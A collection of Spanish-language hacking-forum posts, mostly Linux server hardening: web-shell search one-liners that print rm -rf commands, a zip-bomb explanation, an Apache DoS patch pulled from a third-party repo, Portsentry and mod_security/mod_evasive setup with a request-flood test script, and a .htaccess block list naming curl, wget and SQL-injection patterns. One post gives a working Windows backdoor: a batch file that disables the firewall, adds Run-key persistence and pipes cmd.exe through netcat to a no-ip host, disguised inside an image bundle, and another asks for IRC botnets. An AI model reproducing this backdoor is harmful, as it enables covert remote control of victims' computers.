Hola soy july, me presento después de tiempo vuelvo a estar on algunos me conocen otros no.
Me gusta el hacking y llevo un tiempo en este mundo.
saludos

The Complete FreeBSD es un libro de Greg Lehey publicado por O'Reilly y es "una eminente guía práctica que explica no sólo cómo instalar y ejecutar FreeBSD, sino también cómo convertirlo en un servidor altamente funcional y seguro". (Idioma: Inglés)

Aqui les dejo estas pequeñas lineas de comandos en linux para encontrar las shells r57 y c99 en nuestro servidor, que he copiado y pegado de No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Estos comandos lo que hace es buscar con el comando find en el directory que le digamos y en el tipo de extension que querramos, y con xargs busca dentro del contenido del archivo la palabra r57 o c99 segun le indiquemos, y con awk nos muestra la ruta completa del archivo que contiene r57 y c99, en estos casos nos muestra rm -rf que es el comando para borrar cualquier archivo o carpeta sin preguntar, no recomiendo usar rm -rf sin antes examinar el contenido de los archivos personalmente, vaya a ser que la caguemos.

Para buscar la shell r57 en php

find /var/www/  -name "*".php  -type f -print0  | xargs -0 grep r57 | uniq -c  | sort -u  | cut -d":" -f1  | awk '{print "rm -rf " $2}' | uniq

Para buscar la shell r57 en txt

find /var/www/  -name "*".txt  -type f -print0  | xargs -0 grep r57 | uniq -c  | sort -u  | cut -d":" -f1  | awk '{print "rm -rf " $2}' | uniq

Para buscar la shell r57 en gif

find /var/www/  -name "*".gif  -type f -print0  | xargs -0 grep r57 | uniq -c  | sort -u  | cut -d":" -f1  | awk '{print "rm -rf " $2}' | uniq

Para buscar la shell c99 en php

find /var/www/  -name "*".php  -type f -print0  | xargs -0 grep c99 | uniq -c  | sort -u  | cut -d":" -f1  | awk '{print "rm -rf " $2}' | uniq

Para buscar la shell c99 en jpg

find /var/www/  -name "*".jpg  -type f -print0  | xargs -0 grep c99 | uniq -c  | sort -u  | cut -d":" -f1  | awk '{print "rm -rf " $2}' | uniq

Para buscar la shell c99 en gif
   

find /var/www/  -name "*".gif  -type f -print0  | xargs -0 grep c99 | uniq -c  | sort -u  | cut -d":" -f1  | awk '{print "rm -rf " $2}' | uniq

info de blogofsysadmins

Espero que les sirva saludos.

42.zip es un archivo zip de 42.374 bytes, contiene 16 archivos zips que a su vez contienen otros 16 zips y así hasta 6 veces. Los 16 últimos zips contienen un archivo de 4,3 Gb cada uno. Si descomprimimos el archivo No tienes permitido ver enlaces. Registrate o Entra a tu cuenta de 42.374 bytes obtendriamos 4.5 Pb de datos descomprimidos.

    16 x 4294967295 = 68.719.476.720 (68GB)
    16 x 68719476720 = 1.099.511.627.520 (1TB)
    16 x 1099511627520 = 17.592.186.040.320 (17TB)
    16 x 17592186040320 = 281.474.976.645.120 (281TB)
    16 x 281474976645120 = 4.503.599.626.321.920 (4,5PB)

Este tipo de archivos se denominan Zips de la muerte o Zips bomba y suelen usarse como herramienta para ataques DoS.
PD:  hay que ver como una cosa tan pequeña te puede joder el servidor enterito , así que pequeños sysadmins tener muy definidas las reglas de cuotas de disco con sus respectivas alertas a vuestro email

info obtenida de blogofsysadmins

Hola amigos en la ultima versión de CentOS 6.3 sigue un bug en el apache pudiéndose hacer un DoS con un exploit en C.

Exploit: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Lo compilan, lo lanzan y verán como cae el servidor.

Lo que tenemos que hacer para fixear este error es poner la ultima versión de Apache.

yum update 
yum remove httpd-tools 
wget http://centos.alt.ru/repository/centos/6/i386/httpd-2.2.23-1.el6.i686.rpm 
wget http://centos.alt.ru/repository/centos/6/i386/httpd-tools-2.2.23-1.el6.i686.rpm 
rpm -i httpd-tools-2.2.23-1.el6.i686.rpm ; rpm -i httpd-2.2.23-1.el6.i686.rpm

Con esto ya tendríamos actualizado el Apache a la versión 2.2.23 y sin bug .

En esta oportunidad vamos hablar de una utilidad llamada "Portsentry" la cual nos permite tener un monitoreo de los puertos de nuestro servidor y mediante reglas aplicar una accion a ciertos paquetes generados hacia ellos.

1. Instalacion:

apt-get install portsentry

Luego seguimos el wizard:

Una vez que terminamos con el wizard, seguimos de la siguiente manera:

2. Configuracion:

vi /etc/portsentry/portsentry.conf

Ya dentro del archivo vamos a configurar los siguiente parametros:

TCP_PORTS: Aqui es donde seteamos los puertos bajo el protocolo TCP que van hacer monitoreados

UDP_PORTS: Idem. del punto anterior pero en este caso se basa en el protocolo UDP

En nuestro caso como es un ejemplo practico, vamos a dejar los puertos por defaults.

Ahora pasemos a los parametros advanzados, estos son nombrados asi porque en esta ocacion la aplicacion no abre ningun puerto para su monitoreo como lo hizo en los parametros anteriores, sino que ahora le pide al Kernel que le notifique todos los pedidos hacia los puertos menores seteados en los parametros:

ADVANCED_PORTS_TCP="1024″
ADVANCED_PORTS_UDP="1024″

Como paso siguiente vamos a definir los puertos que no queremos que sean notificados por el Kernel.

ADVANCED_EXCLUDE_TCP="113,139″
ADVANCED_EXCLUDE_UDP="520,138,137,67″

Archivos adicionales de configuracion:

En este archivo seteamos todos los HOST que tenemos de confianza , para que nuestro sistema no tome como un ataque su request.

IGNORE_FILE="/etc/portsentry/portsentry.ignore"
El archivo que configuramos debajo, contiene las direcciones IP que los HOST que solicitaron conectividad hacia los puertos monitoreados.

HISTORY_FILE="/var/lib/portsentry/portsentry.history"

Este archivo contiene las direcciones IPs que nos estan solictando un request en el momento a los puertos, serian las IPs que estan atacando en tiempo real.

BLOCKED_FILE="/var/lib/portsentry/portsentry.blocked"
Parametros sobre las acciones que se van a empleadar a la hora de llegar un request sobre el/los puertos.

BLOCK_UDP="0″
BLOCK_TCP="0″

En este caso tenemos seteado los 2 parametros en "0″, con esto lo que estamos haciendo es registrar los intentos. Debajo dejamos los diferentes seteos:

0: Solo registramos los intentos

1: Bloquemos la direccion IP de origen la cual esta enviando peticiones hacia nuestro server

2: Corremos un comando externo, el cual vamos a setear en el parametro KILL_CMD_RUN

Parametro de resolucion de DNS:

Aqui es donde seteamos si queremos que la aplicacion haga una resolucion de DNS sobre los HOST.

RESOLVE_HOST = "0″

Seteos sobre esta variable:

0: No resolvemos sobre los Host.

1: Hay una resolucion de DNS sobre los Hosts.

En nuestro caso vamos a pasar la parte de configuracion de las variables de KILL_ROUTER

La siguiente variable/parametro lo usamos para escribir en el archivo /etc/host.deny el cual tiene como funcion dropear toda conectividad desde la direccion IP guardada en el hacia nuestro servidor.

KILL_HOSTS_DENY="ALL: $TARGET$ : DENY"

El parametro que hablaremos en la proxima linea tiene como funcion ejecutar el script seteado , como bien explicamos en las variables:

BLOCK_UDP="0″
BLOCK_TCP="0″

KILL_RUN_CMD="/some/path/here/script $TARGET$ $PORT$ $MODE$"

En la siguiente variable, tenemos que tener cierta precaucion porque podemos hacer que nuestro sistema anule conexiones las cuales no son ataques hacia nosotros.

SCAN_TRIGGER="0″

Un valor recomendado como bien vemos dentro del archivo de configuracion es un "2″.

Como ultima variable tenemos el seteo del banner que vamos a mostrar.

PORT_BANNER="ACCESO DENEGADO"

3. Iniciacion de la apliacion:

portsentry -tcp: El sistema hace una verificacion sobre los puertos TCP que fueron seteados

portsentry -udp: Idem. del punto anterior pero ahora verifica los puertos UDP.

portsentry -stcp o -sudp: El sistema inicia en modo stealth, verificando los paquetes ( TCP o UDP segun nuestra eleccion a la hora del inicio) entrantes, si alguno de ellos es un pedido sobre los puertos monitoreados , el sistema dropea esta conexion.

portsentry -atcp: Iniciamos el sistema en modo Advanzado con lo cual usaremos como referencia la variable ADVANCED_PORTS_TCP.

portsentry -audp: Idem. del punto anterior pero vamos a usar ADVANCED_PORTS_UDP como referencia.

Bueno amigos esto es todo de la configuración basica de nuestro server.

Info. obtenida wikipeando

Hola amigos de underc0de,vamos a ver como se instala estos dos modulos de seguridad para apache
y protegernos de ataques DDOS(en centos)

Antes de todo se instala el Apache;

yum -y install httpd

yum -y install httpd-devel

Posteriormente se configura para que el servicio inicie al momento de arrancar el servidor;

chkconfig httpd on

Se inicia el servicio Web;

service httpd start

Por ahora solo se tiene el servicio web Apache arriba. Se descargan e instalan los repositorios adecuados, rpmforge y el repositorio de jasonlitka

Actualizar el paquete rpmforge (y por si ya existe);

rpm -Uvh paquete.rpm

Y  el repositorio de jasonlitka;

cd /etc/yum.repos.d

vim CentOS-Base.repo

y por ultimo se agrega el contenido del repositorio;

[utterramblings]
name=Jason's Utter Ramblings Repo
baseurl=No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
enabled=1
gpgcheck=1
gpgkey=No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Ahora se instala y configura el modulo mod_security;

yum -y install mod_security

Para su configuración se ingresa al directorio /etc/http/modsecurity.d/ y  se edita el archivo de nombre modsecurity_crs_10_config.conf que es el que contiene la configuración básica del modsecurity.

Entre sus principales parámetros  se encuentran;

    SecRuleEngine: Directiva que controla si se procesan las reglas que controlan el comportamiento de mod_security ante peticiones. Se debe poner en On si la versión del mod instalada no lo hiciera ya por defecto
    SecDataDir: Directva que establece un path donde mod_security guardará información que le es necesaria. Debe ser accesible por el servidor, de la misma manera que los logs, lo que requiere permiso de ejecución hasta la carpeta usada como almacén de datos y capacidad de escritura en la misma.
    SecDefaultAction: El conjunto de acciones por defecto que el mod usará en caso de que una de las reglas de seguridad case con una petición. Son una serie de acciones que se toman en orden y que mod_security usará en caso de que la regla en si no establezca una concreta
    Includes: Algunas distribuciones tienen un bug que hace que no se lean todos los archivos .conf existentes en la localización que se dio en el archivo que creamos anteriormente. Esto quiere decir que aunque se lea el .conf primario, no se accederán a los subdirectorios para ver si poseen más archivos .conf. Para solucionar este problema, en caso de sospechar que no se están procesando las reglas, hay que incluir las rutas explicitas a los subdirectorios de la localización de las reglas (/rules), como se ve en la imagen. NOTA: La versión de las core rules actual tiene un error de sintaxis en un archivo de la carpeta optional_rules que impide que las reglas de la misma se procesen, así que permanece desactivado en el fichero mostrado.

Se reinicia el servicio apache para actualizar los cambios;

service httpd restart

Se verifica que el modulo del mod_security este activo;

httpd -M

Debe mostrar como salida;

security2_module (shared)

Listo, tienen su modulo de seguridad activado y corriendo, si desean conocer todos los parámetros y reglas del modulo recuerden visitar el sitio web oficial.

El modulo del mod_evasive permite denegar ataques de tipo DDOS, para instalarse se ejecuta la siguiente sintaxis;

yum -y install mod_evasive

Para configurar las reglas se edita el archivo /etc/httpd/conf.d/mod_evasive.conf , el cual ya viene por defecto con los parámetros recomendados y entre los cuales se encuentran;

    DOSHashTableSize

Cuanto más grande sea el tamaño de la tabla de Hash, más memoria requerirá, pero el rastreo de Ips será más rápido. Es útil aumentar su tamaño si nuestro servidor recibe una gran cantidad de peticiones, pero así mismo la memoria del servidor deberá ser también mayor.

    DOSPageCount

Número de peticiones a una misma página para que una IP sea añadida a la lista de bloqueo, dentro del intervalo de bloqueo en segundos especificado en el parámetro DOSPageInterval

    DOSSiteCount

Igual que 'DOSPageCount', pero corresponde al número de peticiones al sitio en general, usa el intervalo de segundos especificado en 'DOSSiteInterval'.

    DOSPageInterval

Intervalo en segundos para el parámetro umbral de DOSPageCount.

    DOSSiteInterval

Intervalo en segundos para el parámetro umbral DOSSiteCount.

    DOSBlockingPeriod

Periodo de bloqueo para una IP si se supera alguno de los umbrales anteriores.El usuario recibirá un error403 (Forbidden) cuando sea bloqueado, si el atacante lo sigue intentando, este contador se reseteará automáticamente, haciendo que siga más tiempo bloqueada la IP.

    DOSEmailNotify

Dirección de correo electrónico que recibirá información sobre los ataques.

    DosWhitelist

Podemos especificar una IP o rango que será excluido del rastreo por mod_evasive.

Para terminar finalizar se comprueba si cargo el modulo correctamente con el comando httpd -M , que enviara como salida;

evasive20_module (shared)

Así mismo se ejecuta el siguiente script creado en perl para conocer si envía el mensaje Forbidden (403)

#!/usr/bin/perl

# test.pl: small script to test mod_dosevasive's effectiveness

use IO::Socket;
use strict;

for(0..100) {
  my($response);
  my($SOCKET) = new IO::Socket::INET( Proto   => "tcp",
                                      PeerAddr=> "DireccionIP:80");
  if (! defined $SOCKET) { die $!; }
  print $SOCKET "GET /?$_ HTTP/1.0nn";
  $response = <$SOCKET>;
  print $response;
  close($SOCKET);
}

Recuerden que para ejecutar el archivo , primeramente se edita con la dirección IP objeto de prueba , así mismo se guarda con la extensión .pl y se ejecuta con el comando perl , así;

perl No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Si como respuesta ante el ataque se recibe la pagina FORBIDDEN 403 significa que el modulo esta funcionando correctamente.Por ultimo debido a la configuración que viene por defecto en el mod_evasive su dirección IP queda bloqueada por 10 segundos debido al ataque al sitio web, parámetro que también se puede editar agregándola a la DOSWhitelist, sera cuestión de seguir leyendo

info obtenida en centosni

"

Libro enfocado para aquellos administradores de sistemas, gestores y usuarios de Linux que deseen proteger servidores y estaciones de trabajo Linux contra intrusiones no autoriazadas y otras amenazas externas para la integridad de sus sistemas. Esta guia exclusiva de la seguridad en Linux la ha escrito un "hacker" con años de experiencia y en ella se identifican los agujeros y fallos de seguridad existente y potenciales, ademas de como solucionarlos.

El libro abarca todos los temas que un administrador debe dominar, a partir de la instalación y actualización del sistema hasta la creación de paquetes, compilación del kernel y otras tareas avanzadas.

Hola amigos hoy les traigo un .htaccess para proteger sus server web

#Evitar escaneos, manipulación e inyeccion SQL (SQL, XSS, etc)
RewriteCond %{HTTP_USER_AGENT} ^$ [OR]
RewriteCond %{HTTP_USER_AGENT} ^(-|\.|') [OR]
RewriteCond %{HTTP_USER_AGENT} ^(.*)(<|>|%3C|<span class="IL_AD" id="IL_AD1">%3E</span>)(.*) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(java|curl|wget)(.*) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(.*)(libwww-perl|libwwwperl|snoopy|curl|wget|winhttp|python|nikto|scan|clshttp|archiver|loader|<span class="IL_AD" id="IL_AD3">email</span>|harvest|fetch|extract|grab|miner|suck|reaper|leach|havij)(.*) [NC,OR]
RewriteCond %{REQUEST_URI} ^(/,|/;|/<|/>|/'|/`|/%2C|/%3C|/%3E|/%27|/////) [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)(%00|%08|%09|%0A|%0B|%0C|%0D|%0E|%0F|%2C|<|>|'|%3C|%3E|%26%23|%27|%60)(.*) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)(%00|%08|%09|%0A|%0B|%0C|%0D|%0E|%0F|%2C|%3C|%3E|%27|%26%23|%60)(.*) [NC,OR]
RewriteCond %{HTTP_COOKIE} ^(.*)(<|>|'|%3C|%3E|%27)(.*) [NC]
RewriteRule ^(.*)$ index.php [NC]
 
#Evita manipulacion en la URL
RewriteCond %{REQUEST_METHOD} ^(HEAD|<span class="IL_AD" id="IL_AD11">TRACE</span>|DELETE|TRACK) [NC,OR]
RewriteCond %{THE_REQUEST} ^.*(\\r|\\n|%0A|%0D).* [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR]
RewriteCond %{HTTP_COOKIE} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR]
RewriteCond %{REQUEST_URI} ^/(,|;|:|<|>|">|"<|/|\\\.\.\\).{0,9999}.* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^$ [OR]
RewriteCond %{HTTP_USER_AGENT} ^(java|curl|wget).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(libwww|curl|wget|python|nikto|scan).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(localhost|loopback|127\.0\.0\.1).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC]
RewriteRule ^(.*)$ index.php [NC]
#Complica los ataques Remote File include y Local File include
 
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC]
RewriteRule .* – [F]

eso es todo saludosssss

Te explico un poco:


Es cuando la victima se conecta a vos y te da una shell. El no-ip lo que hace redirigir tu ip dinamica a una direccion dns (yo lo tengo cada 3 segundos)  esto hace que por mas que tu ip cambie, siempre se va asociar a tu dns (ej No tienes permitido ver enlaces. Registrate o Entra a tu cuenta) ya explicado esto que hacemos con el netcat hacemos un bat con el nombre vamos.bat

Y le ponemos estos comandos:

nc.exe 

hay que copiarselo a la victima en

copy C:\Extracted\nc.exe C:\WINDOWS\system32\nc.exe

ademas a este bat ponerlo en el registro run, para que?

para que cada vez que se prenda la maquina me lo ejecute

start C:\Extracted\data.exe

Ademas hice un vbs para desabilitar el friweall de windows, que es el siguiente codigo:

Set objFirewall = CreateObject("HNetCfg.FwMgr") 
  Set objPolicy = objFirewall.LocalPolicy.CurrentProfile 

  objPolicy.FirewallEnabled = false 

Esto lo guardamos como  desa.vbs tambien en el bat lo hacemos ejecutar

start C:\Extracted\desa.vbs

lo unico que falta poner el comando para conectarnos

nc loquesea.no-ip.org 80 | cmd.exe | nc loquesea.no-ip.org 443

bueno el bat quedaria asi:

@echo off
start C:\Extracted\desa.vbs
copy C:\Extracted\nc.exe C:\WINDOWS\system32\nc.exe
reg add hklm\software\microsoft\windows\currentversion\run /v wind /t reg_sz /d C:\Extracted\vamos.exe /f 
nc loquesea.no-ip.org 80 | cmd.exe | nc loquesea.no-ip.org 443

y el desa.vbs quedaria asi:

Set objFirewall = CreateObject("HNetCfg.FwMgr") 
  Set objPolicy = objFirewall.LocalPolicy.CurrentProfile 

  objPolicy.FirewallEnabled = false 

Ahora despues que tenes eso,  al bat lo pasamos a exe con Bat To Exe Converter.exe luego unimos todo (nc.exe, desa.vbs, vamos.exe)  al unirlo todo ponemos la foto, el vamos.exe y luego lo demas (hay que respetar el orden) yo uso el programa SFX COMPILER

terminando, en tu maquina pones en un bat :

nc -vv -l -p 80

en otro bat

nc -vv -l -p 443

ejecutas los dos y esperas la coneccion  antes desabilita tu firewall.

Si lo queres probar antes, en una red local o en una maquina virtual (virtual box) es de la siguiente forma:


en la computadora victima copiar nc.exe en sytem32, luego hacer un bat con el siguiente codigo:

nc  ip de tu maquina local 80 | cmd.exe | nc ip de tu maquina local 443

para colocar "|" precional alt + ctrl + 1


Ahora en nuestra maquina desconectar el firewall de windows luego realizar 2 bat y los mismo colocar un comando:

este es 1

nc -vv -l -p 80

este es 2

nc -vv -l -p 443

OJO: PRIMERO EJECUTA ESTOS 2 BAT PARA QUE QUEDEN ESCUCHANDO, Y LUEGO EL COMANDO EN LA VICTIMA.



ESPERO QUE LO ENTIENDAS

hola gente

estoy empezando con esto de botnets quisiera saber alguno que se conecte al irc. vi que aca habia muchos pero sin referencia y no se cual elegir ni cual es mejor  o cual sirve para el irc o para web o escritorio me gustaria si alguien me puede ayudar  y decirme cual es el mejor o por esperiencia cual me conviene muchas gracias por todo y  son una gran comunidad

saludos